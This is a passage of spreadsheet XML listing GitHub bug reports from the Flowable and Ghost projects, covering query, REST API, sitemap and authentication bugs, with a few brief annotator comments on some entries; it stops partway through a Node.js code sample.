    <t>**Describe the bug** The `app-repository/deployments/{id}/resources` REST API returns `mediaType` as `text/xml` for `.form` files. **Expected behavior** Return `application/json`, which is the correct media type for forms. **Additional context** Found in v6.6.0 and further verified in master branch of source [DefaultContentTypeResolver](https://github.com/flowable/flowable-engine/blob/master/modules/flowable-common-rest/src/main/java/org/flowable/common/rest/resolver/DefaultContentTypeResolver.java) Additionally found that `.app` files content type is not included in the common class but in [AppDeploymentResourceResource](https://github.com/flowable/flowable-engine/blob/master/modules/flowable-app-engine-rest/src/main/java/org/flowable/app/rest/service/api/repository/AppDeploymentResourceResource.java) so that should probably be centralised too.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3109</t>
  </si>
  <si>
    <t>[DMN] COLLECT hit policy with `alwaysUseArraysForDmnMultiHitPolicies` returns null/value instead of array</t>
  </si>
  <si>
    <t xml:space="preserve">**Description** BPMN/CMMN dmn service task for `COLLECT` hit policy returns (`protected boolean alwaysUseArraysForDmnMultiHitPolicies = true;`): | hits | output| ||| | none hit | null | | one item hit | `itemValue` | | multiple hits | array of values | The issue is also related to #2286 test: https://github.com/martin-grofcik/flowable-engine/commit/704b6bb1bec7055c708c525880ab2097bc104a55 **Expected behavior** BPMN/CMMN dmn service task for `COLLECT` hit policy returns: | hits | output| ||| | none hit | empty json array `[]` | | one item hit | one item json array `["itemValue"]` | | multiple hits | array of values `["itemA", "ItemB"]`| **Code** `DmnActivityBehavior` java } else { boolean multipleResults = decisionExecutionAuditContainer.isMultipleResults() &amp;&amp; processEngineConfiguration.isAlwaysUseArraysForDmnMultiHitPolicies(); </t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3121</t>
  </si>
  <si>
    <t>HistoricProcessInstanceQuery also query task variable</t>
  </si>
  <si>
    <t>**Describe the bug** when use HistoricProcessInstanceQuery with variable value, it also query query task variable with the same name **Expected behavior** HistoricProcessInstanceQuery only query process variable **Code**  HistoricProcessInstanceQuery query = historyService .createHistoricProcessInstanceQuery() .processInstanceId("abc") .includeProcessVariables(); query.variableValueEquals("process_variable", "process_variable_value"); query.count();  this query produce a sql :  select count(distinct RES.ID_) from ACT_HI_PROCINST RES left outer join ACT_RE_PROCDEF DEF on RES.PROC_DEF_ID_ = DEF.ID_ inner join ACT_HI_VARINST A0 on RES.PROC_INST_ID_ = A0.PROC_INST_ID_ WHERE RES.PROC_INST_ID_ = ? and A0.NAME_ = ? and A0.VAR_TYPE_ = ? and (A0.TEXT_ = ?)  the right sql should be  select count(distinct RES.ID_) from ACT_HI_PROCINST RES left outer join ACT_RE_PROCDEF DEF on RES.PROC_DEF_ID_ = DEF.ID_ inner join ACT_HI_VARINST A0 on RES.PROC_INST_ID_ = A0.PROC_INST_ID_ WHERE RES.PROC_INST_ID_ = ? and A0.NAME_ = ? and A0.VAR_TYPE_ = ? and (A0.TEXT_ = ?) and A0.TASK_ID_ IS NULL  **Additional context** flowable: 6.6.0 , 6.7.0 database: mysql</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3536</t>
  </si>
  <si>
    <t>Historic variables API crashes after terminating process instance during multi-instance sub process or call activity</t>
  </si>
  <si>
    <t>**Describe the bug** Consulting the `GET /history/historic-variable-instances` API crashes for variables "nrOfActiveInstances" and "nrOfCompletedInstances" variables when you (prematurely) stop a process instance (with the `DELETE runtime/process-instances/{processInstanceId}` API) during a multi-instance execution (eg. using the `subProcess` or `callActivity` constructs). **Expected behavior** Loading the historic variables should never crash obviously. **Code** Deploy this model ([ModelWithSubProcess.bpmn20.xml.zip](https://github.com/flowable/flowable-engine/files/10114350/ModelWithSubProcess.bpmn20.xml.zip)) to a Flowable engine, start a new process instance using the `POST runtime/process-instances` API, retrieve the process instance id from the response body and stop it again using the `DELETE runtime/process-instances/{processInstanceId}` Then go and retrieve the historic variables using the `GET history/historic-variable-instances?processInstanceId={processInstanceId}&amp;size=500` API. This will result in an HTTP 500 server error with content: &lt;img width="327" alt="image" src="https://user-images.githubusercontent.com/599538/204570166-958a29a5-a04f-4056-9752-79735b6ec847.png"&gt;  and log the following exception: [flowable-exception.txt](https://github.com/flowable/flowable-engine/files/10114434/flowable-exception.txt) Notice that this does work if you query for a specific variableName as long as it is not "nrOfActiveInstances" or "nrOfCompletedInstances". If you look at the database, the most noticeable thing is that the `var_type_` in `act_hi_varinst` for both variables is "bpmnParallelMultiInstanceCompleted". This is also the case when the process is still running, but at that time the API does not "crash". If you complete the process instance in a normal manner (by submitting the 3 tasks until an end event is reached), the `var_type_` for both variables is changed to "integer" and the API also continues to work as expected. **Additional context** Tested in Flowable 6.7.2 Able to reproduce in our own production and UAT environments as well as in an empty spawned [docker flowable-ui container from docker hub](https://hub.docker.com/r/flowable/flowable-ui). The same bug occurred when we use a multi-instance `callActivity` (as opposed to a mutli-instance `subProcess` in the example model above).</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3659</t>
  </si>
  <si>
    <t>createHistoricProcessInstanceQuery().list() returns DefinitionCategory.</t>
  </si>
  <si>
    <t xml:space="preserve"> historyService.createHistoricProcessInstanceQuery().processDefinitionCategory("test").list();  This interface can use `processDefinitionCategory()` as the query condition, but the return value does not include `DefinitionCategory`.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3827</t>
  </si>
  <si>
    <t>Unexpected result when querying process instances in Flowable 7.0.1</t>
  </si>
  <si>
    <t>**Describe the bug** Hi all, I have found what it could be a bug in the recent `7.0.1` version. When using `HistoryService` to query process instances, it's using `or` instead of `and` for the query criteria. It was working well in `7.0.0`. **Expected behavior** Here is a test that, in my opinion, should be passing. I run a query with two criteria: * `createdAfter(yesterday)` (always true) * `processInstanceId == "NONEXISTENT_ID"` (always false) I expect the `count()` to be `0`, as I expect the search to look for `criteria1 AND criteria2`  @Test @Deployment(resources = ["processes/simple_process.bpmn20.xml"]) fun `counts returns 0 when filtering by unknown process instance id`() { // Define the filter val yesterday = OffsetDateTime.now().minusDays(1).toDate() val tasksQuery = historyService.createHistoricTaskInstanceQuery() tasksQuery.taskCreatedAfter(yesterday) tasksQuery.processInstanceId("NONEXISTENT_ID") // Create an instance runtimeService.startProcessInstanceByKey("simple_process") // Count the instances that match the filter val total = tasksQuery.count() // No instances are expected to match with id "NONEXISTENT_ID") assertEquals(0, total) }  Looking at the logs, the SQL generated is as follows:  select count(distinct RES.ID_) from ACT_HI_TASKINST RES WHERE RES.PROC_INST_ID_ IN ( ? ) or RES.START_TIME_ &gt; ?  In version `7.0.0` the SQL is as follows:  select count(distinct RES.ID_) from ACT_HI_TASKINST RES WHERE RES.PROC_INST_ID_ IN ( ? ) and RES.START_TIME_ &gt; ?  (Notice `or` vs `and`) **Code** Looking at the [diff between 7.0.0 and 7.0.1](https://github.com/flowable/flowable-engine/compare/flowable-7.0.0flowable-7.0.1), I see that [there has been a change in the file `HistoricTaskInstance.xml`](https://github.com/flowable/flowable-engine/blame/9aecece6e4ecdaa3c5368b1d8fe34bd2032a9190/modules/flowable-task-service/src/main/resources/org/flowable/task/service/db/mapping/entity/HistoricTaskInstance.xml#L1338) in the commit [`8e2be39`](https://github.com/flowable/flowable-engine/commit/8e2be39dca356bde5949fb07c706f068a35735ac) that might be related (some `and`'s have been replaced by `or`'s). **Additional context** I am using Flowable 7.0.0 with Spring Boot 3.2.1</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3856</t>
  </si>
  <si>
    <t>REST API responses with null value for UUID variable types</t>
  </si>
  <si>
    <t>**Describe the bug** The REST API method `flowable-rest/service/query/historic-variable-instances` returns null as value of variable of type `uuid`  { "id": "85077ed6-d62c-11ee-ae20-86c5a61b31b3", "processInstanceId": "827254fd-d62c-11ee-ae20-86c5a61b31b3", "processInstanceUrl": "http://test-server/flowable-rest/service/history/historic-process-instances/827254fd-d62c-11ee-ae20-86c5a61b31b3", "taskId": null, "executionId": "827254fd-d62c-11ee-ae20-86c5a61b31b3", "variable": { "name": "animalId", "type": "uuid", "value": null, //&lt; here is unexpected null "scope": "global" } },  **Expected behavior** The UUID variable value should be serialized as string like  "value": "201d919d-9974-4813-8628-ae815f311678",  **Code** /flowable-rest/src/main/java/org/flowable/rest/service/api/RestResponseFactory.java method `createRestVariable` is searching for a convertor list of `variableConverters`. But there is no variable converter for variable type `org.flowable.variable.service.impl.types.UUIDType` so the createRestVariable returns a RestVariable with null value. **Additional context** Problem was reproduced on Flowable 6.8.0, but I checked the sources and it exists on main branch too. Would be nice to have a fix in next 7.0.x release as we are going to upgrade to that version soon. I am going to provide a Pull request for the fix soon.</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/14508</t>
  </si>
  <si>
    <t>Impersonation tokens do signup action if no account is found</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When a user is deleted it is expected that all tokens associated with that account are revoked. This is currently not the case. Creating a token before deleting a user creates the account again when pasted into the browser.  Steps to Reproduce 1. Create an access token for an account. 2. Delete that account. 3. Paste that token into your browser. 4. User is created again. The user should NOT be created again and all tokens should be revoked when a user is deleted.  Ghost Version 4.44.0  Node.js Version 16.14.2  How did you install Ghost? OS - Debian 11 with MariaDB 10.5.15  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t xml:space="preserve">can sign in again via acces token looks like data validation bug at the endpoint </t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/14980</t>
  </si>
  <si>
    <t>Tenor V1 API has been decomissioned, unable to load Gifs from editor.</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Whenever trying to insert a gif from Tenor on the editor, the error "Unable to connect to Tenor, please check your connection" intermittently appears. The reason for this is that Tenor V1 API has been deprecated and migrated to a Google Api.  Steps to Reproduce 1. Start writing a Post or a new Page 2. on the editor enter the `/tenor` command to open the GIF Search card 3. Tenor will display the error `Uh oh! Trouble reaching the Tenor API, please check your connection`  Ghost Version 5.2  Node.js Version 16.15.0  How did you install Ghost? Docker  Database type MySQL 8  Browser &amp; OS version Chrome, Mac OS Monterey 12.4  Relevant log / error output shell GET https://g1.tenor.com/v1/trending?media_filter=minimal&amp;key=null&amp;contentfilter=off 401 (Unauthorized)   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/14981</t>
  </si>
  <si>
    <t>Empty sitemap if a taxonomy is removed</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary By deleting a taxonomy from the `routes.yml` file, the deleted taxonomies pages are not generated, but their respective sitemap are. They are empty, but some tools like Google Search Console warn users that their sitemap is wrong because it's empty. Example of my [website](https://www.benjaminrancourt.ca/sitemap.xml), where I've disabled the `authors` taxonomy. html &lt;tr&gt; &lt;td&gt; &lt;a href="https://www.benjaminrancourt.ca/sitemap-authors.xml"&gt; https://www.benjaminrancourt.ca/sitemap-authors.xml &lt;/a&gt; &lt;/td&gt; &lt;td&gt;1970-01-01 00:00&lt;/td&gt; &lt;/tr&gt;  ![image](https://user-images.githubusercontent.com/7907713/174452395-01298c43-b958-4844-9d08-e4daeb9bff8e.png) &gt; The sitemap can be read, but it contains errors | Empty sitemap ![image](https://user-images.githubusercontent.com/7907713/174452417-ff20bcd4-ea8a-41cd-8fa3-3c7af6fcca02.png)  I tried to find a way to fix this in Ghost source code, but I couldn't run a working setup on my machine (I really should install Linux ). However, I'll paste my notes I've took while looking into this bug, in the hope that it will at least help you. **core/frontend/services/sitemap/manager.js** js // [Ben] The index sitemap is generated here getIndexXml() { return this.index.getXml(); } createIndexGenerator(options) { // [Ben] Solution 1: If some taxonomies are disabled, can we remove them from the options below? return new IndexMapGenerator({ types: { pages: this.pages, posts: this.posts, authors: this.authors, tags: this.tags }, maxPerPage: options.maxPerPage }); }  core/frontend/services/sitemap/index-generator.js js generateSiteMapUrlElements() { // [Ben] We iterate over each resource type here return _.map(this.types, (resourceType) =&gt; { // `|| 1` = even if there are no items we still have an empty sitemap file const noOfPages = Math.ceil(Object.keys(resourceType.nodeLookup).length / this.maxPerPage) || 1; const pages = []; for (let i = 0; i &lt; noOfPages; i++) { const page = i  0 ? '' : `-${i + 1}`; const url = urlUtils.urlFor({relativeUrl: '/sitemap-' + resourceType.name + page + '.xml'}, true); const lastModified = resourceType.lastModified; // [Ben] Solution 2: For disabled taxonomies, I suspect their lastModified property is undefined. // Therefore, maybe we could not push this resource sitemap if it's the case? pages.push({ sitemap: [ {loc: url}, {lastmod: moment(lastModified).toISOString()} ] }); } return pages; }).flat(); }  Thanks to the Ghost team!  Steps to Reproduce 1. Disable a taxonomy like `tags` or `authors` (https://ghost.org/docs/themes/routing/#removing-taxonomies) 2. Go to `/sitemap.xml` 3. The disabled taxonomies will have an empty sitemap with a `Last Modified` date of `1970-01-01 00:00`  Ghost Version 5.2.3  Node.js Version v16.15.0  How did you install Ghost? Docker  Database type MySQL 8  Browser &amp; OS version Google Chrome | Windows 10  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/14983</t>
  </si>
  <si>
    <t>[Content API] Url set to 404 for tags when using multiple fields</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When using multiple [fields](https://ghost.org/docs/content-api/#fields) on the Content API, the tag URLs are set to `https://demo.ghost.io/404/` instead of their corresponding URL.  Steps to Reproduce  https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=name json { "tags": [ { "name": "Fables" }, { "name": "Fiction" }, { "name": "Getting Started" }, { "name": "Speeches" } ], "meta": { "pagination": { "page": 1, "limit": 15, "pages": 1, "total": 8, "next": null, "prev": null } } }   https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=url json { "tags": [ { "url": "https://demo.ghost.io/tag/fables/" }, { "url": "https://demo.ghost.io/tag/fiction/" }, { "url": "https://demo.ghost.io/tag/getting-started/" }, { "url": "https://demo.ghost.io/tag/speeches/" } ], "meta": { "pagination": { "page": 1, "limit": 15, "pages": 1, "total": 8, "next": null, "prev": null } } }   https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=name,url  https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=url,name  https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=name%2Curl  https://demo.ghost.io/ghost/api/content/tags/?key=22444f78447824223cefc48062&amp;filter=visibility%3Apublic&amp;fields=url%2Cname json { "tags": [ { "name": "Fables", "url": "https://demo.ghost.io/404/" }, { "name": "Fiction", "url": "https://demo.ghost.io/404/" }, { "name": "Getting Started", "url": "https://demo.ghost.io/404/" }, { "name": "Speeches", "url": "https://demo.ghost.io/404/" } ], "meta": { "pagination": { "page": 1, "limit": 15, "pages": 1, "total": 8, "next": null, "prev": null } } }   Ghost Version 5.2.3  Node.js Version 16  How did you install Ghost? Docker  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15007</t>
  </si>
  <si>
    <t>Cannot get reading time from API via ?fields param</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When making a request to the Content API for posts and including `reading_time` as a field, it is not returned.  Steps to Reproduce Request the demo site with `reading_time`: https://demo.ghost.io/ghost/api/canary/content/posts/?key=22444f78447824223cefc48062&amp;fields=title,url,reading_time Note that it does work if you include the `html` field, which reading time is calculated based on. https://demo.ghost.io/ghost/api/canary/content/posts/?key=22444f78447824223cefc48062&amp;fields=title,url,reading_time,html  Ghost Version 5.2  Node.js Version 14  How did you install Ghost? ghost cli  Database type MySQL 8  Browser &amp; OS version N/a  Relevant log / error output shell n/a   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15252</t>
  </si>
  <si>
    <t>Unable to delete post with nested comment</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Whenever you try to delete a post that has a comment and a reply to that comment, an internal server error occurs: `Internal server error, cannot delete post. Cannot set properties of undefined (setting 'message')`  Steps to Reproduce 1. Create a new blog post and publish it 2. Leave a comment on that blog post 3. Reply to that comment 4. Attempt to delete the blog post  Ghost Version 5.9.4  Node.js Version 16.16  How did you install Ghost? Ubuntu 20.04.4 LTS  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output shell {"name":"Log","hostname":"example","pid":696855,"level":50,"req":{"meta":{"requestId":"07055caf-c581-4d77-81a3-01f7055c77c7","userId":"1"},"url":"/posts/62fdbbfb752fb6a221f26e9d/","method":"DELETE","originalUrl":"/ghost/api/admin/posts/62fdbbfb752fb6a221f26e9d/","params":{},"headers":{"host":"blog.example.org","cf-ipcountry":"US","cdn-loop":"cloudflare","accept-encoding":"gzip","x-forwarded-for":"**REDACTED**","cf-ray":"**REDACTED**","x-forwarded-proto":"https, https","cf-visitor":"{\"scheme\":\"https\"}","accept":"application/json, text/javascript, */*; q=0.01","x-requested-with":"XMLHttpRequest","x-ghost-version":"5.9","app-pragma":"no-cache","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36","content-type":"application/json; charset=UTF-8","sec-gpc":"1","origin":"https://blog.example.org","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://blog.example.org/ghost/","accept-language":"en-US,en;q=0.9,de;q=0.8","cf-connecting-ip":"**REDACTED**","cookie":"**REDACTED**","x-forwarded-host":"blog.example.org"},"query":{}},"res":{"_headers":{"x-powered-by":"Express","cache-control":"no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0","access-control-allow-origin":"https://blog.example.org","vary":"Origin, Accept-Encoding","content-type":"application/json; charset=utf-8","content-length":"286","etag":"W/\"11e-JGRxNJsjDWlG04oL0DLfIS39Z7M\""},"statusCode":500,"responseTime":"70ms"},"err":{"id":"eec45ac0-1eab-11ed-8676-618ce3f5ed56","domain":"https://blog.example.org","code":null,"name":"InternalServerError","statusCode":500,"level":"critical","message":"Cannot set properties of undefined (setting 'message')","stack":"TypeError: Cannot set properties of undefined (setting 'message')\n at module.exports.prepareError (/var/www/blog.example.org/versions/5.9.4/node_modules/@tryghost/mw-error-handler/lib/mw-error-handler.js:79:19)\n at ErrorCtor (/var/www/blog.example.org/versions/5.9.4/node_modules/create-error/create-error.js:29:18)\n at runMicrotasks (&lt;anonymous&gt;)\n at processTicksAndRejections (node:internal/process/task_queues:96:5)","hideStack":false},"msg":"Cannot set properties of undefined (setting 'message')","time":"2022-08-18T04:12:11.248Z","v":0}   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15291</t>
  </si>
  <si>
    <t>Regression: Redirect to signin/re-authenticate modal not shown when logged out</t>
  </si>
  <si>
    <t>We've had a regression with how unauthenticated requests are handled by Admin. Unauthenticated requests could occur if you've logged out in another tab and didn't realise you'd gone back to editing on a tab that looked like it was still logged in. ## Steps to reproduce 1. Open Ghost admin and ensure you're logged in in two different tabs 2. In tab 1, open the editor 3. In tab 2, logout 4. In tab 1, attempt to save ## Previous behaviour - whilst editing - show a re-authentication modal to allow quick sign-in and save - whilst performing any other action - redirect to signin screen ## Current behaviour: - all actions - show a slightly cryptic alert message `Authorization failed Unable to determine the authenticated user or integration. Check that cookies are being passed through if using session authentication.` This is likely happening because we've moved from a `401` to a `403`. The cookie is being sent so the request is not "Unauthenticated" but it no longer matches a valid session so its "Unauthorized". Admin isn't currently set up to recognise a 403 and trigger the auto-logout/re-authenticate behaviour. There are potential edge cases if we treat 403 and 401 the same when it's a genuine "not permitted" error but Admin shouldn't be making any such requests unless your role is changed by another user whilst you're using it. Note: There is a skipped test for the re-authentication modal here: https://github.com/TryGhost/Ghost/blob/0695f74a653bff85d5a08ee7f97fc9a4a8ddbe63/ghost/admin/tests/acceptance/authentication-test.js#L97 which may have contributed to this regression slipping in. Ideally we'd get this test running again as well to prevent this regressing in future.  Ghost Version 5.10</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15470</t>
  </si>
  <si>
    <t>Saving different settings screens open in different tabs can overwrite with old values</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary If you open two settings screens in different tabs, make changes in the first and save, make changes in the second and save, then the second save will have overwritten your changes from the first save with the old values. Related forum discussion: https://forum.ghost.org/t/editing-code-injection-and-navigation-at-the-same-time-does-not-work/32984/7  Steps to Reproduce 1. Open "Code injection" settings screen in one tab 2. Open "Navigation" settings screen in another tab 3. Enter some text into the code injection fields and save 4. Make a change on the navigation screen and save 5. Refresh the code injection screen After doing this you'll find that the changes you made on the code injection screen have been "undone".  Ghost Version 5.16.0  Node.js Version 16.15.0  How did you install Ghost? Local  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>? - bug</t>
  </si>
  <si>
    <t xml:space="preserve">it ui related error </t>
  </si>
  <si>
    <t>how is it ui only error?</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15505</t>
  </si>
  <si>
    <t>Starting Ghost with missing active theme breaks Design Settings screen</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary If the selected active theme does not exist in the filesystem the Design Settings screen errors and is unusable. The problem occurs because Ghost's API is returning an unexpected state - when requesting a list of themes none of them has the active: true flag. The preferred solution is to cater for this state in Admin somehow e.g. have a blank-slate state for the design settings screen indicating that no theme is active and point user to the change-theme screen  Steps to Reproduce 1. Activate a custom theme 2. Stop Ghost and delete or rename the custom theme directory 3. Start Ghost 4. Try to access the design settings screen ![image](https://user-images.githubusercontent.com/101513/193050450-fdd1b30c-f923-49a8-99a6-eedb5c5a96e6.png)  Ghost Version 5.16  Node.js Version 16  How did you install Ghost? ghost install  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output shell &lt;img width="630" alt="image" src="https://user-images.githubusercontent.com/101513/193117369-f2947482-993a-440e-91c8-6f5cc11a5c37.png"&gt;   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15608</t>
  </si>
  <si>
    <t>new tag with new post, link to the new tag = 404</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary 1. create a new post with content ; 2. add a new tag alongside the new post ; 3. the new tag will appear in the site, but the link to that tag is 404 ; 4. can only be fixed by restarting ghost.  Steps to Reproduce 1. create a new post with content ; 2. add a new tag alongside the new post ;  Ghost Version 5.18.0  Node.js Version v18.10.0  How did you install Ghost? self-hosted on ubuntu 22  Database type MySQL 8  Browser &amp; OS version ubuntu 22.04  Relevant log / error output shell tested on both node v16.15.0 and v18.10.0 can only be fixed by restarting ghost.   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/15931</t>
  </si>
  <si>
    <t>`latest` tag on NPM is not updated for @tryghost/portal</t>
  </si>
  <si>
    <t>https://unpkg.com/@tryghost/portal@latest/umd/portal.min.js still points to an outdated version  2.13.2  but it should to 2.21.0. The problem is that the `latest` tag has not been updated after a few last releases  NPM also shows outdated version: &lt;img width="389" alt="Screenshot 2022-12-13 at 13 10 57" src="https://user-images.githubusercontent.com/1338731/207314549-62ea365e-1718-408c-a1d7-d1363ae95473.png"&gt; &lt;img width="775" alt="Screenshot 2022-12-13 at 13 11 21" src="https://user-images.githubusercontent.com/1338731/207314620-f1bb1612-9837-49d2-a34d-e41c339106d2.png"&gt; &lt;details&gt; &lt;summary&gt;Original (incorrect) issue&lt;/summary&gt; ## `url` in Stripe `members/api/create-stripe-checkout-session/` is not handled  `publicKey` is expected  Issue Summary When a request to `members/api/create-stripe-checkout-session/` is made, the response is an object with a single field: `{url: ""}`. Yet, some functions do not handled that well. For example, it's correctly handled here: https://github.com/TryGhost/Ghost/blob/74d0fee1259476cd29962ecae2181c7e13b3932b/ghost/portal/src/utils/api.js#L385-L387 but not here: https://github.com/TryGhost/Ghost/blob/74d0fee1259476cd29962ecae2181c7e13b3932b/ghost/portal/src/utils/api.js#L432  Steps to Reproduce 1. Go to https://news.typeofweb.com 2. Scroll down a bit 3. Click on the blue floating "Subskrybuj" button in the bottom right corner. 4. Continue with a paid subscription PLN 5/month 5. See error in the console. 6. Inspect network tab and notice that the endpoint returned `{url}` instead of `{publicKey}`  Ghost Version 74d0fee1259476cd29962ecae2181c7e13b3932b  Node.js Version irrelevant  How did you install Ghost? irrelevant  Database type MySQL 5.7  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository &lt;/details&gt;</t>
  </si>
  <si>
    <t>it has api endpoint</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/16048</t>
  </si>
  <si>
    <t>Improve error message for YouTube videos that disabled embedding</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary EDIT: I've figured out that this specific YouTube doesn't allow embedding. Maybe you could improve the error message shown to the user if you get the `Unauthorized` message (see below) so this causes less confusion. I have also updated the issue title to reflect this. I'm leaving the following text here as was to leave the context.  In general, YouTube embedding works. But this specific returns an error: `https://www.youtube.com/watch?v=5f-JlzBuUUU`. ![CleanShot 2022-12-25 at 20 10 24@2x](https://user-images.githubusercontent.com/1881676/209479558-2388988d-e2db-4116-b7bb-0b56eef57e1f.jpg) The request is the following:  https://cassandradispatch.org/ghost/api/admin/oembed/?url=https://www.youtube.com/watch?v=5f-JlzBuUUU&amp;type=embed  The error response is the following: json { "errors": [ { "message": "Internal server error, cannot read oembed.", "context": "invalid json response body at https://www.youtube.com/oembed?format=json&amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D5f-JlzBuUUU reason: Unexpected token U in JSON at position 0", "type": "InternalServerError", "details": null, "property": null, "help": null, "code": null, "id": "e01223d0-8487-11ed-94c3-8df7a8a46270", "ghostErrorCode": null } ] }  This is becaue the request `https://www.youtube.com/oembed?format=json&amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D5f-JlzBuUUU` Returns `Unauthorized` as the response body.  Steps to Reproduce 1. Create a new post (or edit an existing one) 2. Click the "plus" sign to add a new bloc and choose "YouTube" 3. Paste this URL: `https://www.youtube.com/watch?v=5f-JlzBuUUU` 4. See the error  Ghost Version 5.26.3  Node.js Version 16.18.1  How did you install Ghost? Hetzner, Ubuntu 22.04.1  Database type MySQL 8  Browser &amp; OS version _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/16748</t>
  </si>
  <si>
    <t>admin/members/:id/signin_url won't take Owner's staff access token</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary I'm trying to make a fetch request to admin/members/:id/signin_url The [commit](https://github.com/TryGhost/Ghost/commit/b0ff1e7cacf619deed1d4f07c3cb0e7731707597) (Hi @naz !) that added the functionality seems to suggest this is possible. I'm converting the owner's staff access token into a JWT successfully, based on it working elsewhere on the admin API. I've tried on Ghost Pro (but it was a site where I'd switched owners, so could be an edge case). I've also tried on a production 5.13 self-hosted site, and on a 5.47 local install (Windows). Here's what I'm getting back (fresh 5.47 install, but all cases are the same): Request to: http://localhost:2368/ghost/api/canary/admin/members/6456ef85849b402bb40c61f4/signin_urls/  errors: [ { message: 'Permission error, cannot read member_signin_url.', context: 'You do not have permission to read member_signin_urls', type: 'NoPermissionError', details: null, property: null, help: null, code: null, id: '714c58e0-ec6e-11ed-94c9-6ba7df6bb971', ghostErrorCode: null } ]  The endpoint works fine if I pass in the site owner's cookie.  Steps to Reproduce  const session = require('express-session') const express = require("express"); const fetch = require('node-fetch') const app = express(); app.use(express.json()); app.use(express.urlencoded({ extended: false })); const jwt = require('jsonwebtoken') const GhostAdminAPI = require('@tryghost/admin-api'); const GHOST_URL = 'http://localhost:2368' let GHOST_API_KEY = '6456efec849b402bb40c61fc:07df42c75551444cb88af8601acbdcc4cc0d8ea983392ddb44dbb1cebb87a32b'; //local install, not worried about leakage. let [GHOST_ID, GHOST_SECRET] = GHOST_API_KEY.split(':') const api = new GhostAdminAPI({ url: GHOST_URL, key: GHOST_API_KEY, version: "v5.0", }); let GHOST_TOKEN = jwt.sign({}, Buffer.from(GHOST_SECRET, 'hex'), { // eslint-disable-line no-undef keyid: GHOST_ID, algorithm: 'HS256', expiresIn: '5m', audience: '/canary/admin' }); console.log(GHOST_TOKEN) async function getMember(email) { let result = await api.members.browse({email:email, limit: 1}) console.log('getMember result is', result[0].id) return result[0].id; } async function getAuthUrl(id) { // does not work let result = await fetch(GHOST_URL + '/ghost/api/canary/admin/members/' + id + '/signin_urls/', { method: 'GET' , headers: { 'Authorization': `Ghost ${GHOST_TOKEN}`, 'Content-type': 'application/json'} } ) let json= await result.json() console.log('result is', json) return result; } async function getMemberUrl(id) { // works fine console.log('getMemberUrl request to: ', GHOST_URL + '/ghost/api/canary/admin/members/' + id ) let result = await fetch( GHOST_URL + '/ghost/api/canary/admin/members/' + id , { method: 'GET' , headers: { 'Authorization': 'Ghost ' + GHOST_TOKEN} }) let json= await result.json() console.log('result is', json) return result; } app.get("/", async 